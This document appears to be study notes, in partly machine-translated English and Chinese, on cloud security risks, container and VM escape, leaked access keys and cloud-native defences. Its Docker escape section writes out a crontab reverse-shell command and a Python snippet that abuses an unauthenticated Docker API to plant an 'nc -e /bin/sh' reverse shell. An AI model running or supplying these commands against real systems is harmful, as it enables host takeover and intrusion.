Risks to cloud security:
1) Access control (insufficient network layer isolation, application layer IAM, IDAAS configuration problems)
2) identity and credential leakage (aksk, account number)
3) wrong configuration (security group, es, db unauthorized)
4) security vulnerabilities (tenant Open application security vulnerabilities, platform escape-Venom)
5) Security compliance (audit log/security protection)
6) DDoS attack (being attacked or attacking others)
7) Abuse of cloud resources (mining, bypassing the wall)
8) Cloud native Security (mirror, baseline, non-isolated, runtime protection)
Common Serious Vulnerabilities in Cloud Security
1. Escape
Defensive response : monitor 0day and hot repair, quick response to hot migration capabilities; security product monitoring (interception, alarm)
escape and penetration : vulnerability exploit detection, write host high-risk operation crontab, ssh public key configuration, network links, etc.
**eg1:**Virtual machine (vm) 2015 venom escape vulnerability:
模拟服务输入输出的时候缓存溢出执行恶意shellcode完成控制
eg2:
2020 模拟USB驱动溢出漏洞
eg3: Docker escape
1) Privileged container:
judge the privileged startup as a privileged startup
cat /proc/self/status |grep CapEff (centos 0000001fffffffff,ubuntu 0000003fffff)
Hang in the root directory to write scheduled tasks:
fdisk -l ; mkdir sectest;mount /dev/dm-0 sectest;crontab 写 bash -i >& /dev/tcp/xx.x.x.x/8888
2) Mount Docker.sock
3) runC escape cve-2019-5736 (< 18.09.2)
requires a user to enter through exec to trigger the payload, use the runC file to be overwritten and rewritten to obtain the control file handle and then get it to the host Permission
4) The docker api is not authorized to 2375/2376, use path notification to write timing tasks to achieve control
detection: get xxxx:2375/version returns docker version information
use:
import docker
client = docker.DockerClient(base_url='http://xx.168.0.138:2375') data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc 192.168.0.138 1234 -e /bin/sh' >> /tmp/etc/crontabs/root" ''', remove=True, volumes={
'/etc': {
'bind': '/tmp/etc', 'mode': 'rw'}})
print(data)
5) The accesskey on the control plane takes over all containers of the product
2. Vulnerabilities of cloud service components
ES、Redis未授权、弱口令,OSS公有读写,docker系漏洞和逻辑漏洞等。 因云的开放性每个系统存在的问题暴露后将可在公网无门槛的攻击。
3. accesskey leakage
系统ak又超级ak,
产品控制面ak、
用户层ak
4. Network penetration
租户流量穿透到IDC管理网、或者 租户1横向到租户2
Underlay under the cloud:
basic service security: access authentication, north-south, east-west encryption, and trusted areas with minimized isolation.
Overlay on the cloud:
product configuration risks: unauthorized public network services, weak passwords; oss public read and write; high-risk components open to the outside world
Cloud Native Security:
镜像安全:恶意文件、组件漏洞
安全CIS基线:k8s集群配置基线,容器应用配置; 平台级应用mtls
微隔离:网络隔离 和 文件隔离
runtime:内存马、shell、逃逸
In subsequent iterations...